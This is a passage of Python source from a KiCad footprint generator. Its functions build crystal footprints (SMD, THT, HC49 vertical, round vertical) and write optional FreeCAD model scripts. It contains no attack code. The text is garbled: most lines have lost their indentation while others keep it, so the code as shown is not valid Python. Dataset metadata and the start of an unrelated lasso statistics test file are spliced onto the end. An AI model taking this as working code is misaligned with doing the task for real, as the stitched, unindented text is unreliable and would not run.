kicad_modg.append(PolygoneLine(polygone=[[-overpads_x_slk / 2, -overpads_y_slk / 2],
[-overpads_x_slk / 2, overpads_y_slk / 2],
[overpads_x_slk / 2, overpads_y_slk / 2]], layer='F.SilkS',
width=lw_slk))
else:
if (pack_height < overpad_height and pack_width < overpad_width):
kicad_modg.append(PolygoneLine(polygone=[[mark_l_slk, betweenpads_y_slk / 2],
[l_slk, betweenpads_y_slk / 2],
[l_slk, -betweenpads_y_slk / 2]], layer='F.SilkS',
width=lw_slk))
kicad_modg.append(PolygoneLine(polygone=[[l_slk + w_slk, -betweenpads_y_slk / 2],
[l_slk + w_slk, betweenpads_y_slk / 2]], layer='F.SilkS',
width=lw_slk))
if pins == 4:
kicad_modg.append(PolygoneLine(polygone=[[-betweenpads_x_slk / 2, t_slk],
[betweenpads_x_slk / 2, t_slk]], layer='F.SilkS',
width=lw_slk))
kicad_modg.append(PolygoneLine(polygone=[[betweenpads_x_slk / 2, t_slk + h_slk],
[-betweenpads_x_slk / 2, t_slk + h_slk],
[-betweenpads_x_slk / 2, mark_b_slk]], layer='F.SilkS',
width=lw_slk))
elif (pack_height < overpad_height and pack_width > overpad_width):
kicad_modg.append(PolygoneLine(polygone=[[overpads_x_slk / 2, t_slk],
[l_slk + w_slk, t_slk],
[l_slk + w_slk, t_slk + h_slk],
[overpads_x_slk / 2, t_slk + h_slk]], layer='F.SilkS',
width=lw_slk))
if pins == 4:
kicad_modg.append(PolygoneLine(polygone=[[-betweenpads_x_slk / 2, t_slk],
[betweenpads_x_slk / 2, t_slk]], layer='F.SilkS',
width=lw_slk))
if style == 'dip':
DIPRectL_LeftOnly(kicad_modg, [l_slk, t_slk], [(w_slk - overpads_x_slk) / 2, h_slk], 'F.SilkS',
lw_slk, dip_size_slk)
kicad_modg.append(
Line(start=[betweenpads_x_slk / 2, t_slk + h_slk], end=[-betweenpads_x_slk / 2, t_slk + h_slk],
layer='F.SilkS',
width=lw_slk))
else:
kicad_modg.append(PolygoneLine(polygone=[[-overpads_x_slk / 2, mark_b_slk],
[-overpads_x_slk / 2, t_slk + h_slk],
[l_slk, t_slk + h_slk],
[l_slk, t_slk],
[-overpads_x_slk / 2, t_slk]], layer='F.SilkS',
width=lw_slk))
if pins==4:
kicad_modg.append(PolygoneLine(polygone=[[betweenpads_x_slk / 2, t_slk + h_slk],
[-betweenpads_x_slk / 2, t_slk + h_slk],
[-betweenpads_x_slk / 2, mark_b_slk]], layer='F.SilkS',
width=lw_slk))
elif (pack_height > overpad_height and pack_width < overpad_width):
kicad_modg.append(PolygoneLine(polygone=[[l_slk, -overpads_y_slk / 2],
[l_slk, t_slk],
[l_slk + w_slk, t_slk],
[l_slk + w_slk, -overpads_y_slk / 2]], layer='F.SilkS',
width=lw_slk))
kicad_modg.append(PolygoneLine(polygone=[[mark_l_slk, overpads_y_slk / 2],
[l_slk, overpads_y_slk / 2],
[l_slk, t_slk + h_slk],
[l_slk + w_slk, t_slk + h_slk],
[l_slk + w_slk, overpads_y_slk / 2]], layer='F.SilkS',
width=lw_slk))
if pins == 4:
kicad_modg.append(PolygoneLine(polygone=[[mark_l_slk, betweenpads_y_slk / 2],
[l_slk, betweenpads_y_slk / 2],
[l_slk, -betweenpads_y_slk / 2]], layer='F.SilkS',
width=lw_slk))
kicad_modg.append(PolygoneLine(polygone=[[l_slk + w_slk, -betweenpads_y_slk / 2],
[l_slk + w_slk, betweenpads_y_slk / 2]], layer='F.SilkS',
width=lw_slk))
# create courtyard
kicad_mod.append(RectLine(start=[roundCrt(l_crt + offset[0]), roundCrt(t_crt + offset[1])],
end=[roundCrt(l_crt + offset[0] + w_crt), roundCrt(t_crt + offset[1] + h_crt)],
layer='F.CrtYd', width=lw_crt))
# create pads
pad_type = Pad.TYPE_SMT
pad_shape1 = Pad.SHAPE_RECT
pad_layers = 'F'
ddrill = 0
if (pins == 2):
kicad_modg.append(Pad(number=1, type=pad_type, shape=pad_shape1, at=[-pad_sep_x / 2, 0], size=pad, drill=ddrill,
layers=[pad_layers + '.Cu', pad_layers + '.Mask']))
kicad_modg.append(Pad(number=2, type=pad_type, shape=pad_shape1, at=[pad_sep_x / 2, 0], size=pad, drill=ddrill,
layers=[pad_layers + '.Cu', pad_layers + '.Mask']))
elif (pins == 3):
kicad_modg.append(Pad(number=1, type=pad_type, shape=pad_shape1, at=[-pad_sep_x, 0], size=pad, drill=ddrill,
layers=[pad_layers + '.Cu', pad_layers + '.Mask']))
kicad_modg.append(Pad(number=2, type=pad_type, shape=pad_shape1, at=[0, 0], size=pad, drill=ddrill,
layers=[pad_layers + '.Cu', pad_layers + '.Mask']))
kicad_modg.append(Pad(number=3, type=pad_type, shape=pad_shape1, at=[pad_sep_x, 0], size=pad, drill=ddrill,
layers=[pad_layers + '.Cu', pad_layers + '.Mask']))
elif (pins == 4):
kicad_modg.append(
Pad(number=1, type=pad_type, shape=pad_shape1, at=[-pad_sep_x / 2, pad_sep_y / 2], size=pad, drill=ddrill,
layers=[pad_layers + '.Cu', pad_layers + '.Mask']))
kicad_modg.append(
Pad(number=2, type=pad_type, shape=pad_shape1, at=[pad_sep_x / 2, pad_sep_y / 2], size=pad, drill=ddrill,
layers=[pad_layers + '.Cu', pad_layers + '.Mask']))
kicad_modg.append(
Pad(number=3, type=pad_type, shape=pad_shape1, at=[pad_sep_x / 2, -pad_sep_y / 2], size=pad, drill=ddrill,
layers=[pad_layers + '.Cu', pad_layers + '.Mask']))
kicad_modg.append(
Pad(number=4, type=pad_type, shape=pad_shape1, at=[-pad_sep_x / 2, -pad_sep_y / 2], size=pad, drill=ddrill,
layers=[pad_layers + '.Cu', pad_layers + '.Mask']))
elif (pins == 6):
kicad_modg.append(
Pad(number=1, type=pad_type, shape=pad_shape1, at=[-pad_sep_x , pad_sep_y / 2], size=pad, drill=ddrill,
layers=[pad_layers + '.Cu', pad_layers + '.Mask']))
kicad_modg.append(
Pad(number=2, type=pad_type, shape=pad_shape1, at=[0, pad_sep_y / 2], size=pad, drill=ddrill,
layers=[pad_layers + '.Cu', pad_layers + '.Mask']))
kicad_modg.append(
Pad(number=3, type=pad_type, shape=pad_shape1, at=[pad_sep_x , pad_sep_y / 2], size=pad, drill=ddrill,
layers=[pad_layers + '.Cu', pad_layers + '.Mask']))
kicad_modg.append(
Pad(number=4, type=pad_type, shape=pad_shape1, at=[pad_sep_x , -pad_sep_y / 2], size=pad, drill=ddrill,
layers=[pad_layers + '.Cu', pad_layers + '.Mask']))
kicad_modg.append(
Pad(number=5, type=pad_type, shape=pad_shape1, at=[0, -pad_sep_y / 2], size=pad, drill=ddrill,
layers=[pad_layers + '.Cu', pad_layers + '.Mask']))
kicad_modg.append(
Pad(number=6, type=pad_type, shape=pad_shape1, at=[-pad_sep_x, -pad_sep_y / 2], size=pad, drill=ddrill,
layers=[pad_layers + '.Cu', pad_layers + '.Mask']))
if hasAdhesive:
fillCircle(kicad_modg, center=adhesivePos, radius=adhesiveSize / 2, width=0.1, layer='F.Adhes')
# add model
kicad_modg.append(
Model(filename=lib_name + ".3dshapes/" + fpname + ".wrl", at=offset3d, scale=scale3d, rotate=rotate3d))
# print render tree
# print(kicad_mod.getRenderTree())
# print(kicad_mod.getCompleteRenderTree())
# write file
file_handler = KicadFileHandler(kicad_mod)
file_handler.writeFile(fpname + '.kicad_mod')
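# Illustrative call (all dimensions are made-up placeholders, not taken from a datasheet):
# makeSMDCrystal("Crystal_SMD_Example", addSizeFootprintName=True, pins=4,
#                pad_sep_x=2.2, pad_sep_y=1.6, pad=[1.4, 1.2],
#                pack_width=3.2, pack_height=2.5, pack_bevel=0.2)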
def makeCrystalAll(footprint_name, rm, pad_size, ddrill, pack_width, pack_height, pack_offset, pack_rm, style="flat",
package_pad=False, package_pad_add_holes=False, package_pad_offset=0, package_pad_size=[0, 0],
package_pad_drill_size=[1.2, 1.2], package_pad_ddrill=0.8, description="Crystal THT",
lib_name="Crystals", tags="", offset3d=[0, 0, 0], scale3d=[1, 1, 1], rotate3d=[0, 0, 0],
name_addition="", pad_style="tht", script3d="", height3d=4.65, iheight3d=4):
makeCrystal(footprint_name, rm, pad_size, ddrill, pack_width, pack_height, pack_offset, pack_rm, style,
False, False, package_pad_offset, package_pad_size,
package_pad_drill_size, package_pad_ddrill, description,
lib_name, tags, offset3d, scale3d, rotate3d,
name_addition, pad_style, script3d, height3d, iheight3d)
if package_pad:
makeCrystal(footprint_name, rm, pad_size, ddrill, pack_width, pack_height, pack_offset, pack_rm, style,
True, False, package_pad_offset, package_pad_size,
package_pad_drill_size, package_pad_ddrill, description,
lib_name, tags, offset3d, scale3d, rotate3d,
name_addition + "_1EP_style1", pad_style, script3d, height3d, iheight3d)
if package_pad_add_holes and package_pad:
makeCrystal(footprint_name, rm, pad_size, ddrill, pack_width, pack_height, pack_offset, pack_rm, style,
True, True, package_pad_offset, package_pad_size,
package_pad_drill_size, package_pad_ddrill, description,
lib_name, tags, offset3d, scale3d, rotate3d,
name_addition + "_1EP_style2", pad_style, script3d, height3d, iheight3d)
# +---------------------------------------------------------------+ ^
# OOOOO | | |
# OO1OO----^--- | | |
# OOOOO | ----+ ^ | |
# | | | | |
# rm | pack_rm | pack_height
# | | | | |
# OOOOO | ----+ v | |
# OO2OO ---v--- | | |
# OOOOO | | |
# +---------------------------------------------------------------+ v
# <-----------------pack_width------------------------------------>
# <------------->pack_offset
#
#
# pins=2,3
# style="flat"/"hc49"
# pad_style=tht/smd for pin 1/2
def makeCrystal(footprint_name, rm, pad_size, ddrill, pack_width, pack_height, pack_offset, pack_rm, style="flat",
package_pad=False, package_pad_add_holes=False, package_pad_offset=0, package_pad_size=[0, 0],
package_pad_drill_size=[1.2, 1.2], package_pad_ddrill=0.8, description="Crystal THT",
lib_name="Crystals", tags="", offset3d=[0, 0, 0], scale3d=[1, 1, 1], rotate3d=[0, 0, 0],
name_addition="", pad_style="tht", script3d="", height3d=4.65, iheight3d=4):
fpname = footprint_name
fpname = fpname + name_addition
    if type(pad_size) is list:
        pad = [pad_size[1], pad_size[0]]
    else:
        pad = [pad_size, pad_size]
pad3pos = [rm / 2, package_pad_offset + package_pad_size[0] / 2]
pad3dril_xoffset = package_pad_size[1] / 2 + package_pad_ddrill / 2
h_fab = pack_width
w_fab = pack_height
l_fab = -(w_fab - rm) / 2
t_fab = pack_offset
h_slk = h_fab + 2 * slk_offset
w_slk = w_fab + 2 * slk_offset
l_slk = l_fab - slk_offset
t_slk = t_fab - slk_offset
bev = 0
if style == "hc49":
bev = min(0.35, max(2 * lw_slk, w_slk / 7))
    slk_u_line = False
    if package_pad:
        if package_pad_size[1] < pack_width / 2:
            h_slk = math.fabs((pad3pos[1] - package_pad_size[0] / 2 - slk_offset) - t_slk)
            slk_u_line = True
        else:
            h_slk = max(t_slk + h_slk, pad3pos[1] + package_pad_size[0] / 2 + slk_offset) - t_slk
        l_slk = min(l_slk, rm / 2 - package_pad_size[1] / 2 - slk_offset)
        w_slk = max(l_slk + w_slk, rm / 2 + package_pad_size[1] / 2 + slk_offset) - l_slk
        if package_pad_add_holes:
            l_crt = pad3pos[0] - pad3dril_xoffset - package_pad_drill_size[0] / 2 - crt_offset
    extra_textoffset = 0
    if l_slk > -(pad[0] / 2 + slk_offset + lw_slk):
        extra_textoffset = pad[0] / 2 + slk_offset + lw_slk - 0.5
    t_crt = -pad[1] / 2 - crt_offset
    w_crt = max(pack_height + 2 * bev + 4 * crt_offset, pad[0] + rm, w_slk) + 2 * crt_offset
    h_crt = max(t_slk + h_slk - t_crt, pad3pos[1] + package_pad_size[0] / 2 - t_crt - crt_offset, pack_width + pack_offset + pad[1] / 2) + 2 * crt_offset
    l_crt = rm / 2 - w_crt / 2
    if package_pad and package_pad_add_holes and pad[1] < pack_width / 2:
        l_crt = min(l_crt, pad3pos[0] - pad3dril_xoffset - package_pad_drill_size[0] / 2 - crt_offset)
        w_crt = max(w_crt, pad3pos[0] + pad3dril_xoffset + package_pad_drill_size[0] / 2 + crt_offset - l_crt)
print(fpname)
if script3d!="":
with open(script3d, "a") as myfile:
myfile.write("\n\n # {0}\n".format(footprint_name))
myfile.write("import FreeCAD\n")
myfile.write("import os\n")
myfile.write("import os.path\n\n")
myfile.write("# d_wire\nApp.ActiveDocument.Spreadsheet.set('B5', '0.02')\n")
myfile.write("App.ActiveDocument.recompute()\n")
myfile.write("# W\nApp.ActiveDocument.Spreadsheet.set('B1', '{0}')\n".format(pack_width) )
myfile.write("# Wi\nApp.ActiveDocument.Spreadsheet.set('C1', '{0}')\n".format(int(pack_width*0.96)) )
myfile.write("# H\nApp.ActiveDocument.Spreadsheet.set('B2', '{0}')\n".format(pack_height))
myfile.write("# Hi\nApp.ActiveDocument.Spreadsheet.set('C2', '{0}')\n".format(int(pack_height*0.96)))
myfile.write("# height3d\nApp.ActiveDocument.Spreadsheet.set('B3', '{0}')\n".format(height3d))
myfile.write("# iheight3d\nApp.ActiveDocument.Spreadsheet.set('C3', '{0}')\n".format(iheight3d))
myfile.write("# RM\nApp.ActiveDocument.Spreadsheet.set('B4', '{0}')\n".format(rm))
myfile.write("# d_wire\nApp.ActiveDocument.Spreadsheet.set('B5', '{0}')\n".format(ddrill-0.3))
myfile.write("# pack_offset\nApp.ActiveDocument.Spreadsheet.set('B6', '{0}')\n".format(pack_offset))
myfile.write("# pack_rm\nApp.ActiveDocument.Spreadsheet.set('B7', '{0}')\n".format(pack_rm))
myfile.write("App.ActiveDocument.recompute()\n")
myfile.write("doc = FreeCAD.activeDocument()\n")
myfile.write("__objs__=[]\n")
myfile.write("for obj in doc.Objects: \n")
myfile.write(" if obj.ViewObject.Visibility:\n")
myfile.write(" __objs__.append(obj)\n")
myfile.write("\nFreeCADGui.export(__objs__,os.path.split(doc.FileName)[0]+os.sep+\"{0}.wrl\")\n".format(fpname))
myfile.write("doc.saveCopy(os.path.split(doc.FileName)[0]+os.sep+\"{0}.FCStd\")\n".format(fpname))
myfile.write("print(\"created {0}\")\n".format(fpname))
desc = description
tag_s = tags
# init kicad footprint
kicad_mod = Footprint(fpname)
kicad_mod.setDescription(desc)
kicad_mod.setTags(tags)
offset = [0, 0]
if pad_style == "smd":
        offset = [-rm / 2, -pad3pos[1] / 2]
kicad_mod.setAttribute('smd')
kicad_modg = Translation(offset[0], offset[1])
kicad_mod.append(kicad_modg)
else:
kicad_modg = kicad_mod
# set general values
    kicad_modg.append(
        Text(type='reference', text='REF**',
             at=[l_slk - bev / 2 - txt_offset - extra_textoffset, t_crt + h_crt / 4],
             layer='F.SilkS', rotation=90))
    kicad_modg.append(
        Text(type='value', text=fpname,
             at=[l_slk + w_slk + txt_offset + extra_textoffset + bev / 2, t_crt + h_crt / 4],
             layer='F.Fab', rotation=90))
# create FAB-layer
kicad_modg.append(RectLine(start=[l_fab, t_fab],
end=[l_fab + w_fab, t_fab + h_fab], layer='F.Fab', width=lw_fab))
kicad_modg.append(PolygoneLine(polygone=[[l_fab + w_fab / 2 - pack_rm / 2, t_fab],
[0, t_fab/2],
[0, 0]], layer='F.Fab', width=lw_fab))
kicad_modg.append(PolygoneLine(polygone=[[l_fab + w_fab / 2 + pack_rm / 2, t_fab],
[rm, t_fab/2],
[rm, 0]], layer='F.Fab', width=lw_fab))
if package_pad and package_pad_add_holes:
kicad_modg.append(
Line(start=[pad3pos[0] - pad3dril_xoffset, pad3pos[1]], end=[pad3pos[0] + pad3dril_xoffset, pad3pos[1]],
layer='F.Fab', width=lw_fab))
if style == "hc49":
kicad_modg.append(RectLine(start=[l_fab - bev, t_fab], end=[l_fab + w_fab + bev, t_fab - lw_fab], layer='F.Fab',
width=lw_fab))
# create SILKSCREEN-layer
if package_pad and package_pad_add_holes:
kicad_modg.append(PolygoneLine(polygone=[[l_slk, pad3pos[1] - package_pad_drill_size[1] / 2 - slk_offset],
[l_slk, t_slk],
[l_slk + w_slk, t_slk],
[l_slk + w_slk,
pad3pos[1] - package_pad_drill_size[1] / 2 - slk_offset]],
layer='F.SilkS', width=lw_slk))
else:
if slk_u_line:
kicad_modg.append(PolygoneLine(polygone=[[l_slk, t_slk + h_slk],
[l_slk, t_slk],
[l_slk + w_slk, t_slk],
[l_slk + w_slk, t_slk + h_slk]], layer='F.SilkS', width=lw_slk))
else:
kicad_modg.append(
RectLine(start=[l_slk, t_slk], end=[l_slk + w_slk, t_slk + h_slk], layer='F.SilkS', width=lw_slk))
    kicad_modg.append(PolygoneLine(polygone=[[l_slk + w_slk / 2 - pack_rm / 2, t_slk],
                                             [0, max(t_slk / 2, pad[1] / 2 + slk_offset)],
                                             [0, pad[1] / 2 + slk_offset]], layer='F.SilkS', width=lw_slk))
    kicad_modg.append(PolygoneLine(polygone=[[l_slk + w_slk / 2 + pack_rm / 2, t_slk],
                                             [rm, max(t_slk / 2, pad[1] / 2 + slk_offset)],
                                             [rm, pad[1] / 2 + slk_offset]], layer='F.SilkS', width=lw_slk))
if style == "hc49":
kicad_modg.append(
RectLine(start=[l_slk - bev, t_slk], end=[l_slk + w_slk + bev, t_slk - lw_slk], layer='F.SilkS',
width=lw_slk))
# create courtyard
kicad_mod.append(RectLine(start=[roundCrt(l_crt + offset[0]), roundCrt(t_crt + offset[1])],
end=[roundCrt(l_crt + w_crt + offset[0]), roundCrt(t_crt + h_crt + offset[1])],
layer='F.CrtYd', width=lw_crt))
# create pads
pad_type = Pad.TYPE_THT
pad_shape1 = Pad.SHAPE_CIRCLE
pad_layers = '*'
if pad_style == "smd":
kicad_modg.append(Pad(number=1, type=Pad.TYPE_SMT, shape=Pad.SHAPE_RECT, at=[0, 0], size=pad, drill=0,
layers=['F.Cu', 'F.Mask']))
kicad_modg.append(Pad(number=2, type=Pad.TYPE_SMT, shape=Pad.SHAPE_RECT, at=[rm, 0], size=pad, drill=0,
layers=['F.Cu', 'F.Mask']))
else:
kicad_modg.append(Pad(number=1, type=pad_type, shape=pad_shape1, at=[0, 0], size=pad, drill=ddrill,
layers=[pad_layers + '.Cu', pad_layers + '.Mask']))
kicad_modg.append(Pad(number=2, type=pad_type, shape=pad_shape1, at=[rm, 0], size=pad, drill=ddrill,
layers=[pad_layers + '.Cu', pad_layers + '.Mask']))
if package_pad:
kicad_modg.append(Pad(number=3, type=Pad.TYPE_SMT, shape=Pad.SHAPE_RECT, at=pad3pos,
size=[package_pad_size[1], package_pad_size[0]], drill=0, layers=['F.Cu', 'F.Mask']))
if package_pad_add_holes:
kicad_modg.append(
Pad(number=3, type=Pad.TYPE_THT, shape=Pad.SHAPE_RECT, at=[pad3pos[0] - pad3dril_xoffset, pad3pos[1]],
size=package_pad_drill_size, drill=package_pad_ddrill,
layers=[pad_layers + '.Cu', pad_layers + '.Mask']))
kicad_modg.append(
Pad(number=3, type=Pad.TYPE_THT, shape=Pad.SHAPE_RECT, at=[pad3pos[0] + pad3dril_xoffset, pad3pos[1]],
size=package_pad_drill_size, drill=package_pad_ddrill,
layers=[pad_layers + '.Cu', pad_layers + '.Mask']))
# add model
kicad_modg.append(
Model(filename=lib_name + ".3dshapes/" + fpname + ".wrl", at=offset3d, scale=scale3d, rotate=rotate3d))
# print render tree
# print(kicad_mod.getRenderTree())
# print(kicad_mod.getCompleteRenderTree())
# write file
file_handler = KicadFileHandler(kicad_mod)
file_handler.writeFile(fpname + '.kicad_mod')
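# Illustrative call (HC-49/U-style dimensions are placeholders only):
# makeCrystal("Crystal_THT_Example", rm=4.88, pad_size=1.5, ddrill=0.7,
#             pack_width=10.3, pack_height=3.8, pack_offset=1.0, pack_rm=3.0,
#             style="hc49")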
# +----------------------------------------------------+ ^
# / \ |
# / OOOOO OOOOO \ |
# | OOOOO OOOOO | pack_height
# \ OOOOO OOOOO / |
# \ / |
# +----------------------------------------------------+ v
# <-------------------------pack_width----------------------->
# <-------------rm------------------>
#
#
# pins=2,3
def makeCrystalHC49Vert(footprint_name, pins, rm, pad_size, ddrill, pack_width, pack_height, innerpack_width, innerpack_height,
description="Crystal THT", lib_name="Crystals", tags="", offset3d=[0, 0, 0], scale3d=[1, 1, 1], rotate3d=[0, 0, 0], addSizeFootprintName=False,
script3d="", height3d=10):
fpname = footprint_name
desc = description
tag_s = tags
if addSizeFootprintName:
fpname += "-{2}pin_w{0:2.1f}mm_h{1:2.1f}mm".format(pack_width, pack_height, pins)
desc = description + ", length*width={0:2.1f}x{1:2.1f}mm^2 package, package length={0:2.1f}mm, package width={1:2.1f}mm, {2} pins".format(pack_width, pack_height,pins)
tag_s = tags + " {0:2.1f}x{1:2.1f}mm^2 package length {0:2.1f}mm width {1:2.1f}mm {2} pins".format(pack_width, pack_height,pins)
if type(pad_size) is list:
pad = [pad_size[1], pad_size[0]]
else:
pad = [pad_size, pad_size]
    centerpos = [rm / 2, 0]
    pin1pos = [0, 0]
    pin2pos = [rm, 0]
    pin3pos = [rm / 2, 0]
    if pins == 3:
        pin2pos = [rm / 2, 0]
        pin3pos = [rm, 0]
w_fab = pack_width
h_fab = pack_height
l_fab = -(w_fab - rm) / 2
t_fab = -h_fab/2
iw_fab = innerpack_width
ih_fab = innerpack_height
il_fab = -(iw_fab - rm) / 2
it_fab = -ih_fab/2
    incomplete_slk = False
h_slk = h_fab + 2 * slk_offset
w_slk = w_fab + 2 * slk_offset
l_slk = l_fab - slk_offset
t_slk = t_fab - slk_offset
l_crt=l_slk-crt_offset
t_crt=t_slk-crt_offset
w_crt=w_slk+2*crt_offset
h_crt = h_slk + 2 * crt_offset
    if pack_width < rm + pad[0]:
        l_crt = min(-pad[0] / 2, l_fab) - crt_offset
        w_crt = max(rm + pad[0], w_fab) + 2 * slk_offset
        incomplete_slk = True
    angle_slk = math.degrees(math.acos((pad[1] / 2 + slk_offset) / (h_slk / 2)))
print(fpname)
if script3d!="":
with open(script3d, "a") as myfile:
myfile.write("\n\n # {0}\n".format(footprint_name))
myfile.write("import FreeCAD\n")
myfile.write("import os\n")
myfile.write("import os.path\n\n")
myfile.write("# d_wire\nApp.ActiveDocument.Spreadsheet.set('B5', '0.02')\n")
myfile.write("App.ActiveDocument.recompute()\n")
myfile.write("# W\nApp.ActiveDocument.Spreadsheet.set('B1', '{0}')\n".format(pack_width) )
myfile.write("# Wi\nApp.ActiveDocument.Spreadsheet.set('C1', '{0}')\n".format(innerpack_width) )
myfile.write("# H\nApp.ActiveDocument.Spreadsheet.set('B2', '{0}')\n".format(pack_height))
myfile.write("# Hi\nApp.ActiveDocument.Spreadsheet.set('C2', '{0}')\n".format(innerpack_height))
myfile.write("# height3d\nApp.ActiveDocument.Spreadsheet.set('B3', '{0}')\n".format(height3d))
myfile.write("# RM\nApp.ActiveDocument.Spreadsheet.set('B4', '{0}')\n".format(rm))
myfile.write("# d_wire\nApp.ActiveDocument.Spreadsheet.set('B5', '{0}')\n".format(ddrill-0.3))
myfile.write("App.ActiveDocument.recompute()\n")
myfile.write("doc = FreeCAD.activeDocument()\n")
myfile.write("__objs__=[]\n")
myfile.write("for obj in doc.Objects: \n")
myfile.write(" if obj.ViewObject.Visibility:\n")
myfile.write(" __objs__.append(obj)\n")
myfile.write("\nFreeCADGui.export(__objs__,os.path.split(doc.FileName)[0]+os.sep+\"{0}.wrl\")\n".format(fpname))
myfile.write("doc.saveCopy(os.path.split(doc.FileName)[0]+os.sep+\"{0}.FCStd\")\n".format(fpname))
myfile.write("print(\"created {0}\")\n".format(fpname))
# init kicad footprint
kicad_mod = Footprint(fpname)
kicad_mod.setDescription(desc)
    kicad_mod.setTags(tag_s)
offset = [0, 0]
kicad_modg = kicad_mod
# set general values
kicad_modg.append(Text(type='reference', text='REF**', at=[centerpos[0], t_slk-txt_offset], layer='F.SilkS'))
kicad_modg.append(Text(type='value', text=fpname, at=[centerpos[0], t_slk+h_slk+txt_offset], layer='F.Fab'))
# create FAB-layer
THTQuartz(kicad_modg, [l_fab,t_fab], [w_fab,h_fab], 'F.Fab', lw_fab)
THTQuartz(kicad_modg, [il_fab,it_fab], [iw_fab,ih_fab], 'F.Fab', lw_fab)
# create SILKSCREEN-layer
if incomplete_slk:
THTQuartzIncomplete(kicad_modg, [l_slk, t_slk], [w_slk, h_slk], angle_slk, 'F.SilkS', lw_slk)
else:
THTQuartz(kicad_modg, [l_slk,t_slk], [w_slk,h_slk], 'F.SilkS', lw_slk)
# create courtyard
kicad_mod.append(RectLine(start=[roundCrt(l_crt + offset[0]), roundCrt(t_crt + offset[1])],
end=[roundCrt(l_crt + w_crt + offset[0]), roundCrt(t_crt + h_crt + offset[1])],
layer='F.CrtYd', width=lw_crt))
# create pads
pad_type = Pad.TYPE_THT
pad_shape1 = Pad.SHAPE_CIRCLE
pad_layers = '*'
kicad_modg.append(Pad(number=1, type=pad_type, shape=pad_shape1, at=pin1pos, size=pad, drill=ddrill,
layers=[pad_layers + '.Cu', pad_layers + '.Mask']))
kicad_modg.append(Pad(number=2, type=pad_type, shape=pad_shape1, at=pin2pos, size=pad, drill=ddrill,
layers=[pad_layers + '.Cu', pad_layers + '.Mask']))
if pins==3:
kicad_modg.append(Pad(number=3, type=pad_type, shape=pad_shape1, at=pin3pos, size=pad, drill=ddrill,
layers=[pad_layers + '.Cu', pad_layers + '.Mask']))
# add model
kicad_modg.append(
Model(filename=lib_name + ".3dshapes/" + fpname + ".wrl", at=offset3d, scale=scale3d, rotate=rotate3d))
# print render tree
# print(kicad_mod.getRenderTree())
# print(kicad_mod.getCompleteRenderTree())
# write file
file_handler = KicadFileHandler(kicad_mod)
file_handler.writeFile(fpname + '.kicad_mod')
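# Illustrative call (placeholder dimensions):
# makeCrystalHC49Vert("Crystal_HC49_Vertical_Example", pins=2, rm=4.88,
#                     pad_size=1.5, ddrill=0.7, pack_width=10.9, pack_height=4.7,
#                     innerpack_width=9.7, innerpack_height=3.5)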
# +---------------------------------------+
# / \
# / \
# / \
# / OOOOO OOOOO \
# | OOOOO OOOOO |
# \ OOOOO OOOOO /
# \ /
# \ /
# \ /
# +--------------------------------------+
# <-----------------pack_diameter------------------>
# <-------------rm-------->
#
#
# pins=2,3
def makeCrystalRoundVert(footprint_name, rm, pad_size, ddrill, pack_diameter,
description="Crystal THT", lib_name="Crystals", tags="", offset3d=[0, 0, 0], scale3d=[1, 1, 1],
rotate3d=[0, 0, 0]):
fpname = footprint_name
if type(pad_size) is list:
pad = [pad_size[1], pad_size[0]]
else:
pad = [pad_size, pad_size]
centerpos = [rm / 2, 0]
pin1pos = [0, 0]
pin2pos = [rm, 0]
d_fab = pack_diameter
cl_fab = rm / 2
ct_fab = 0
d_slk = d_fab + 2 * slk_offset
cl_slk = cl_fab
ct_slk = ct_fab
sl_slk = 0
if d_fab >= rm + pad[0]:
st_slk = 0
sl_slk = min(-(d_fab - rm) / 2, - pad[0] / 2) - slk_offset
alpha_slk = 180
elif d_slk * d_slk / 4 >= rm * rm / 4:
st_slk = -max(math.sqrt(d_slk * d_slk / 4 - rm * rm / 4), pad[1] / 2 + slk_offset)
        alpha_slk = 2 * (
            90 - math.fabs(math.degrees(math.atan(math.fabs(st_slk - centerpos[1]) / math.fabs(sl_slk - centerpos[0])))))
    else:
        st_slk = -pad[1] / 2 - slk_offset
        alpha_slk = 2 * (
            90 - math.fabs(math.degrees(math.atan(math.fabs(st_slk - centerpos[1]) / math.fabs(sl_slk - centerpos[0])))))
d_crt = max(rm + pad[0], d_slk) + 2 * crt_offset
cl_crt = cl_fab
ct_crt = ct_fab
print(fpname)
desc = description
tag_s = tags
# init kicad footprint
kicad_mod = Footprint(fpname)
kicad_mod.setDescription(desc)
kicad_mod.setTags(tags)
offset = [0, 0]
kicad_modg = kicad_mod
# set general values
kicad_modg.append(
Text(type='reference', text='REF**', at=[centerpos[0], ct_slk - d_slk / 2 - txt_offset], layer='F.SilkS'))
kicad_modg.append(
Text(type='value', text=fpname, at=[centerpos[0], ct_slk + d_slk / 2 + txt_offset], layer='F.Fab'))
# create FAB-layer
kicad_mod.append(Circle(center=[cl_fab, ct_fab], radius=d_fab / 2, layer='F.Fab', width=lw_fab))
# create SILKSCREEN-layer
kicad_mod.append(
Arc(center=[cl_slk, ct_slk], start=[sl_slk, st_slk], angle=alpha_slk, layer='F.SilkS', width=lw_slk))
kicad_mod.append(
Arc(center=[cl_slk, ct_slk], start=[sl_slk, -st_slk], angle=-alpha_slk, layer='F.SilkS', width=lw_slk))
# create courtyard
kicad_mod.append(Circle(center=[cl_crt, ct_crt], radius=d_crt / 2, layer='F.CrtYd', width=lw_crt))
# create pads
pad_type = Pad.TYPE_THT
pad_shape1 = Pad.SHAPE_CIRCLE
pad_layers = '*'
kicad_modg.append(Pad(number=1, type=pad_type, shape=pad_shape1, at=pin1pos, size=pad, drill=ddrill,
layers=[pad_layers + '.Cu', pad_layers + '.Mask']))
kicad_modg.append(Pad(number=2, type=pad_type, shape=pad_shape1, at=pin2pos, size=pad, drill=ddrill,
layers=[pad_layers + '.Cu', pad_layers + '.Mask']))
# add model
kicad_modg.append(
Model(filename=lib_name + ".3dshapes/" + fpname + ".wrl", at=offset3d, scale=scale3d, rotate=rotate3d))
# print render tree
# print(kicad_mod.getRenderTree())
# print(kicad_mod.getCompleteRenderTree())
# write file
file_handler = KicadFileHandler(kicad_mod)
file_handler.writeFile(fpname + '.kicad_mod')
|
pointhi/kicad-footprint-generator
|
scripts/tools/footprint_scripts_crystals.py
|
Python
|
gpl-3.0
| 45,603
|
[
"CRYSTAL"
] |
e2fdfc29c1024471588cb4a61d78f2a10301d50e7963692e683a74b25c0813f1
|
from __future__ import division, print_function
import numpy as np
import nose.tools as nt
import regreg.api as rr
from ..modelQ import modelQ
from ..lasso import lasso
from ...tests.instance import gaussian_instance
def test_modelQ():
n, p, s = 200, 50, 4
X, y, beta = gaussian_instance(n=n,
p=p,
s=s,
sigma=1)[:3]
